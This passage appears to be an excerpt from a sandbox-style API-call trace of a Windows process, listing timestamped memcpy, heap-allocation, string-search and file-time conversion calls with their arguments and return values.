_Src=0x8ceb27e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb27f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb280, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb281, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb282, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb283, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb284, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb285, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb286, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb287, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb288, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb289, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb28f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb290, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb291, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb292, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb293, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb294, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb295, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb296, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb297, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb298, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb299, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x198323, _Src=0x8ceb29f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb272, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb273, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb274, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb275, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb276, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb277, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.362] memcpy (in: _Dst=0x19830f, _Src=0x8ceb278, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb279, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27b, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27c, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27d, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27e, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb27f, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb280, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb281, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb282, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb283, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb284, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb285, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb286, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb287, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb288, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb289, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28b, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28c, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28d, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28e, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb28f, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb290, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb291, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb292, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb293, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb294, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb295, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb296, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb297, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb298, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb299, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.363] memcpy (in: _Dst=0x19830f, _Src=0x8ceb29a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.364] GetProcessHeap () returned 0x4c0000 [0174.364] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x0) returned 0x4e4c60 [0174.369] _mbsstr (_Str=0x1982d8, _Substr=0x4263e8) returned 0x0 [0174.369] _mbsstr (_Str=0x1982d8, _Substr=0x4263f0) returned 0x0 [0174.369] _mbsstr (_Str=0x1982d8, _Substr=0x4263f8) returned 0x0 [0174.373] _mbsnbcpy (in: param_1=0x1986b8, param_2=0x1982d8, param_3=0x104 | out: param_1=0x1986b8) returned 0x1986b8 [0174.373] SystemTimeToFileTime (in: lpSystemTime=0x1981e8, lpFileTime=0x1981f8 | out: lpFileTime=0x1981f8) returned 1 [0174.373] LocalFileTimeToFileTime (in: lpLocalFileTime=0x1983e8, lpFileTime=0x19852c | out: lpFileTime=0x19852c) returned 1 [0174.373] memcpy (in: _Dst=0x504d28, _Src=0x1986b4, _Size=0x12c | out: _Dst=0x504d28) returned 0x504d28 [0174.373] GetProcessHeap () returned 0x4c0000 [0174.373] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x9d9d8) returned 0xeadb020 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b8014f, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80150, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80151, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80152, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80153, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80154, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80155, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80156, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80157, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80158, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b80159, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b8015a, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b8015b, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.376] memcpy (in: _Dst=0x198237, _Src=0x8b8015c, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8015d, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8015e, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8015f, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80160, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80161, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80162, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80163, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80164, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80165, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80166, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80167, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80168, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b80169, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8016a, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8016b, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] memcpy (in: _Dst=0x198237, _Src=0x8b8016c, _Size=0x1 | out: _Dst=0x198237) returned 0x198237 [0174.377] GetProcessHeap () returned 0x4c0000 [0174.377] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x84) returned 0x4fe670 [0174.377] GetProcessHeap () returned 0x4c0000 [0174.377] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4000) returned 0x50db10 [0174.378] GetProcessHeap () returned 0x4c0000 [0174.378] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x18) returned 0x500ef0 [0174.379] GetProcessHeap () returned 0x4c0000 [0174.379] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x40) returned 0x4f32a0 [0174.379] GetProcessHeap () returned 0x4c0000 [0174.379] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x2d00) returned 0x511b18 [0174.379] GetProcessHeap () returned 0x4c0000 [0174.380] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8000) returned 0x514820 [0174.380] memcpy (in: _Dst=0x50db10, _Src=0x8b80178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.382] GetProcessHeap () returned 0x4c0000 [0174.382] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4f0) returned 0x51c828 [0174.383] GetProcessHeap () returned 0x4c0000 [0174.383] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f16e8 [0174.383] GetProcessHeap () returned 0x4c0000 [0174.383] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x51cd20 [0174.383] GetProcessHeap () returned 0x4c0000 [0174.383] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4dc2a0 [0174.384] memcpy (in: _Dst=0xeadb020, _Src=0x514820, _Size=0x6785 | out: _Dst=0xeadb020) returned 0xeadb020 [0174.384] memcpy (in: _Dst=0x50db10, _Src=0x8b84178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.384] memcpy (in: _Dst=0xeae17a5, _Src=0x51afa5, _Size=0x187b | out: _Dst=0xeae17a5) returned 0xeae17a5 [0174.384] memcpy (in: _Dst=0xeae3020, _Src=0x514820, _Size=0x521e | out: _Dst=0xeae3020) returned 0xeae3020 [0174.385] memcpy (in: _Dst=0x50db10, _Src=0x8b88178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.385] memcpy (in: _Dst=0xeae823e, _Src=0x519a3e, _Size=0x2de2 | out: _Dst=0xeae823e) returned 0xeae823e [0174.391] memcpy (in: _Dst=0xeaeb020, _Src=0x514820, _Size=0xbb0 | out: _Dst=0xeaeb020) returned 0xeaeb020 [0174.391] GetProcessHeap () returned 0x4c0000 [0174.391] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4e8) returned 0x51d1a8 [0174.391] GetProcessHeap () returned 0x4c0000 [0174.391] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f1b08 [0174.391] GetProcessHeap () returned 0x4c0000 [0174.391] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x51d698 [0174.391] GetProcessHeap () returned 0x4c0000 [0174.391] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4dc020 [0174.391] memcpy (in: _Dst=0xeaebbd0, _Src=0x5153d0, _Size=0x3294 | out: _Dst=0xeaebbd0) returned 0xeaebbd0 [0174.391] memcpy (in: _Dst=0x50db10, _Src=0x8b8c178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.392] memcpy (in: _Dst=0xeaeee64, _Src=0x518664, _Size=0x41bc | out: _Dst=0xeaeee64) returned 0xeaeee64 [0174.392] memcpy (in: _Dst=0xeaf3020, _Src=0x514820, _Size=0x28db | out: _Dst=0xeaf3020) returned 0xeaf3020 [0174.392] memcpy (in: _Dst=0x50db10, _Src=0x8b90178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.392] memcpy (in: _Dst=0xeaf58fb, _Src=0x5170fb, _Size=0x5725 | out: _Dst=0xeaf58fb) returned 0xeaf58fb [0174.393] memcpy (in: _Dst=0xeafb020, _Src=0x514820, _Size=0x145c | out: _Dst=0xeafb020) returned 0xeafb020 [0174.393] memcpy (in: _Dst=0x50db10, _Src=0x8b94178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.393] memcpy (in: _Dst=0xeafc47c, _Src=0x515c7c, _Size=0x1348 | out: _Dst=0xeafc47c) returned 0xeafc47c [0174.393] GetProcessHeap () returned 0x4c0000 [0174.393] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4d4) returned 0x51db20 [0174.393] GetProcessHeap () returned 0x4c0000 [0174.393] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f1848 [0174.393] GetProcessHeap () returned 0x4c0000 [0174.393] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x51e000 [0174.393] GetProcessHeap () returned 0x4c0000 [0174.393] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4dc200 [0174.393] memcpy (in: _Dst=0xeafd7c4, _Src=0x516fc4, _Size=0x5600 | out: _Dst=0xeafd7c4) returned 0xeafd7c4 [0174.395] memcpy (in: _Dst=0x50db10, _Src=0x8b98178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.395] memcpy (in: _Dst=0xeb02dc4, _Src=0x51c5c4, _Size=0x25c | out: _Dst=0xeb02dc4) returned 0xeb02dc4 [0174.395] memcpy (in: _Dst=0xeb03020, _Src=0x514820, _Size=0x6932 | out: _Dst=0xeb03020) returned 0xeb03020 [0174.396] memcpy (in: _Dst=0x50db10, _Src=0x8b9c178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.396] memcpy (in: _Dst=0xeb09952, _Src=0x51b152, _Size=0x16ce | out: _Dst=0xeb09952) returned 0xeb09952 [0174.396] memcpy (in: _Dst=0xeb0b020, _Src=0x514820, _Size=0x519c | out: _Dst=0xeb0b020) returned 0xeb0b020 [0174.396] GetProcessHeap () returned 0x4c0000 [0174.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c8) returned 0x51e488 [0174.396] GetProcessHeap () returned 0x4c0000 [0174.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f15e0 [0174.396] GetProcessHeap () returned 0x4c0000 [0174.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x51e958 [0174.396] GetProcessHeap () returned 0x4c0000 [0174.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4dc638 [0174.397] memcpy (in: _Dst=0xeb101bc, _Src=0x5199bc, _Size=0x70f | out: _Dst=0xeb101bc) returned 0xeb101bc [0174.397] memcpy (in: _Dst=0x50db10, _Src=0x8ba0178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.397] memcpy (in: _Dst=0xeb108cb, _Src=0x51a0cb, _Size=0x2755 | out: _Dst=0xeb108cb) returned 0xeb108cb [0174.397] memcpy (in: _Dst=0xeb13020, _Src=0x514820, _Size=0x42b3 | out: _Dst=0xeb13020) returned 0xeb13020 [0174.397] memcpy (in: _Dst=0x50db10, _Src=0x8ba4178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.398] memcpy (in: _Dst=0xeb172d3, _Src=0x518ad3, _Size=0x3d4d | out: _Dst=0xeb172d3) returned 0xeb172d3 [0174.398] memcpy (in: _Dst=0xeb1b020, _Src=0x514820, _Size=0x319a | out: _Dst=0xeb1b020) returned 0xeb1b020 [0174.398] memcpy (in: _Dst=0x50db10, _Src=0x8ba8178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.398] memcpy (in: _Dst=0xeb1e1ba, _Src=0x5179ba, _Size=0x4e66 | out: _Dst=0xeb1e1ba) returned 0xeb1e1ba [0174.399] memcpy (in: _Dst=0xeb23020, _Src=0x514820, _Size=0x63 | out: _Dst=0xeb23020) returned 0xeb23020 [0174.399] GetProcessHeap () returned 0x4c0000 [0174.399] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4cc) returned 0x4ec9d0 [0174.399] GetProcessHeap () returned 0x4c0000 [0174.399] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f1740 [0174.399] GetProcessHeap () returned 0x4c0000 [0174.399] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x4ecea8 [0174.399] GetProcessHeap () returned 0x4c0000 [0174.399] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4dc548 [0174.399] memcpy (in: _Dst=0xeb23083, _Src=0x514883, _Size=0x26c1 | out: _Dst=0xeb23083) returned 0xeb23083 [0174.399] memcpy (in: _Dst=0x50db10, _Src=0x8bac178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.400] memcpy (in: _Dst=0xeb25744, _Src=0x516f44, _Size=0x58dc | out: _Dst=0xeb25744) returned 0xeb25744 [0174.400] memcpy (in: _Dst=0xeb2b020, _Src=0x514820, _Size=0x1741 | out: _Dst=0xeb2b020) returned 0xeb2b020 [0174.400] memcpy (in: _Dst=0x50db10, _Src=0x8bb0178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.400] memcpy (in: _Dst=0xeb2c761, _Src=0x515f61, _Size=0x68bf | out: _Dst=0xeb2c761) returned 0xeb2c761 [0174.401] memcpy (in: _Dst=0xeb33020, _Src=0x514820, _Size=0x1740 | out: _Dst=0xeb33020) returned 0xeb33020 [0174.401] memcpy (in: _Dst=0xeb34760, _Src=0x515f60, _Size=0xd00 | out: _Dst=0xeb34760) returned 0xeb34760 [0174.401] memcpy (in: _Dst=0x50db10, _Src=0x8bb4178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.401] memcpy (in: _Dst=0xeb35460, _Src=0x516c60, _Size=0x2fab | out: _Dst=0xeb35460) returned 0xeb35460 [0174.401] GetProcessHeap () returned 0x4c0000 [0174.401] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4f0) returned 0x4ed330 [0174.401] GetProcessHeap () returned 0x4c0000 [0174.401] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4f1c68 [0174.401] GetProcessHeap () returned 0x4c0000 [0174.401] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x4ed828 [0174.402] GetProcessHeap () returned 0x4c0000 [0174.402] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee370 [0174.404] memcpy (in: _Dst=0xeb3840b, _Src=0x519c0b, _Size=0x2c15 | out: _Dst=0xeb3840b) returned 0xeb3840b [0174.404] memcpy (in: _Dst=0xeb3b020, _Src=0x514820, _Size=0x11e8 | out: _Dst=0xeb3b020) returned 0xeb3b020 [0174.404] memcpy (in: _Dst=0x50db10, _Src=0x8bb8178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.405] memcpy (in: _Dst=0xeb3c208, _Src=0x515a08, _Size=0x6cf5 | out: _Dst=0xeb3c208) returned 0xeb3c208 [0174.405] memcpy (in: _Dst=0x50db10, _Src=0x8bbc178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.405] memcpy (in: _Dst=0xeb42efd, _Src=0x51c6fd, _Size=0x123 | out: _Dst=0xeb42efd) returned 0xeb42efd [0174.405] memcpy (in: _Dst=0xeb43020, _Src=0x514820, _Size=0x7edc | out: _Dst=0xeb43020) returned 0xeb43020 [0174.406] memcpy (in: _Dst=0xeb4aefc, _Src=0x51c6fc, _Size=0x124 | out: _Dst=0xeb4aefc) returned 0xeb4aefc [0174.406] memcpy (in: _Dst=0xeb4b020, _Src=0x514820, _Size=0x193 | out: _Dst=0xeb4b020) returned 0xeb4b020 [0174.406] memcpy (in: _Dst=0x50db10, _Src=0x8bc0178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.406] memcpy (in: _Dst=0xeb4b1b3, _Src=0x5149b3, _Size=0x25c3 | out: _Dst=0xeb4b1b3) returned 0xeb4b1b3 [0174.406] GetProcessHeap () returned 0x4c0000 [0174.406] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4dc) returned 0x4ee4b8 [0174.406] GetProcessHeap () returned 0x4c0000 [0174.406] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f700 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x4ee9a0 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee460 [0174.407] memcpy (in: _Dst=0xeb4d776, _Src=0x516f76, _Size=0x33bc | out: _Dst=0xeb4d776) returned 0xeb4d776 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4f0) returned 0x4eee28 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x51f180 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x480) returned 0x51fde8 [0174.407] GetProcessHeap () returned 0x4c0000 [0174.407] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c) returned 0x4ee410 [0174.407] memcpy (in: _Dst=0xeb50b32, _Src=0x51a332, _Size=0x24ee | out: _Dst=0xeb50b32) returned 0xeb50b32 [0174.407] memcpy (in: _Dst=0xeb53020, _Src=0x514820, _Size=0x7a1 | out: _Dst=0xeb53020) returned 0xeb53020 [0174.408] memcpy (in: _Dst=0x50db10, _Src=0x8bc4178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.408] memcpy (in: _Dst=0xeb537c1, _Src=0x514fc1, _Size=0x785f | out: _Dst=0xeb537c1) returned 0xeb537c1 [0174.408] memcpy (in: _Dst=0xeb5b020, _Src=0x514820, _Size=0x7a0 | out: _Dst=0xeb5b020) returned 0xeb5b020 [0174.408] memcpy (in: _Dst=0xeb5b7c0, _Src=0x514fc0, _Size=0x397 | out: _Dst=0xeb5b7c0) returned 0xeb5b7c0 [0174.408] memcpy (in: _Dst=0x50db10, _Src=0x8bc8178, _Size=0x4000 | out: _Dst=0x50db10) returned 0x50db10 [0174.409] memcpy (in: _Dst=0xeb5bb57, _Src=0x515357, _Size=0x618f | out: _Dst=0xeb5bb57) returned 0xeb5bb57 [0174.409] 